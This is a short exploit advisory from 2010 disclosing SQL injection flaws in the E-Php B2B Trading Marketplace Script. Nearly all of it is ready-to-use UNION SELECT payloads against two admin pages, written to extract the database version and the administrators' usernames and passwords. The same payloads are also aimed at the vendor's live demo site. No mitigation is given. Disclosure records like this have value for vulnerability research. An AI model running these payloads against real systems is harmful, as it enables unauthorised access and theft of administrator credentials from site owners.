In The Name Of GOD
[+] Exploit Title: E-Php B2B trading Marketplace Script SQL Injection Vulnerability
[+] Date: 2010-11-03
[+] Author : Cru3l.b0y
[+] Software Link: http://www.ephpscripts.com/b2b-trading-portal.php
[+] Tested on: Ubuntu 10.10
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit (1):
http://target/path/admin/view_fb.php?id=-1 union select 1,2,3,4,5,version(),7
http://target/path/admin/view_fb.php?id=-1 union select 1,2,3,4,5,group_concat(es_admin_name,0x3a,es_pwd),7 from ephpcat_admin
[+] Demo :
http://www.ephpscripts.com/demo/b2b/admin/view_fb.php?id=-1 union select 1,2,3,4,5,version(),7
http://www.ephpscripts.com/demo/b2b/admin/view_fb.php?id=-1 union select 1,2,3,4,5,group_concat(es_admin_name,0x3a,es_pwd),7 from ephpcat_admin
[+] Exploit (2):
http://target/path/admin/browsecats.php?cid=-1 union select 1,version(),3,4,5,6,7,8
http://target/path/admin/browsecats.php?cid=-1 union select 1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8 from ephpcat_admin
[+] Demo :
http://www.ephpscripts.com/demo/b2b/admin/browsecats.php?cid=-1 union select 1,version(),3,4,5,6,7,8
http://www.ephpscripts.com/demo/b2b/admin/browsecats.php?cid=-1 union select 1,group_concat(es_admin_name,0x3a,es_pwd),3,4,5,6,7,8 from ephpcat_admin